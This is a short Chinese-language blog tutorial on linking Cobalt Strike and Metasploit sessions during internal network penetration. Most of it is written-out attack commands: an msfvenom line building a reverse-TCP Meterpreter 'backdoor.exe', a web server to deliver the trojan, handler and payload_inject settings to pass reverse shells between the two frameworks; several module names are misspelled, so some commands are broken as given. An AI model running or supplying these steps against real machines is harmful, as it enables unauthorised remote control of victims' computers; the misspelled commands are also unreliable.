Cobalt Strike 与 MSF 联动

使用Cobalt Strike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。

一、Cobalt Strike连接MSF会话

1. 上线msf会话

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > backdoor.exe

img

2. python开启web服务,下载木马

python3 -m http.server 80

img

3. msf进行监听模式

msfconsole
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.128
set lport 4444
run

运行木马反弹shell
img

4. 开启Cobalt Strike

./teamserver 10.10.10.128 123456

客户端连接后,添加一个监听
img

5. 会话转移到CS上

backgroud
use exploit/window/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 10.10.10.128
set lport 8888
set DisablePayloadHandler True
set PrependMigrate True
sessions -l
set session 1
run

img
img

二、MSF连接Cobalt Strike会话

1. 添加一个监听,生成一个木马程序
img

img

2. 重新添加一个监听器
img

3. 会话转义到MSF

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 9999
set lhost 0.0.0.0
exploit

img
img

posted @ 2024-04-13 14:19  kalixcn  阅读(8)  评论(0编辑  收藏  举报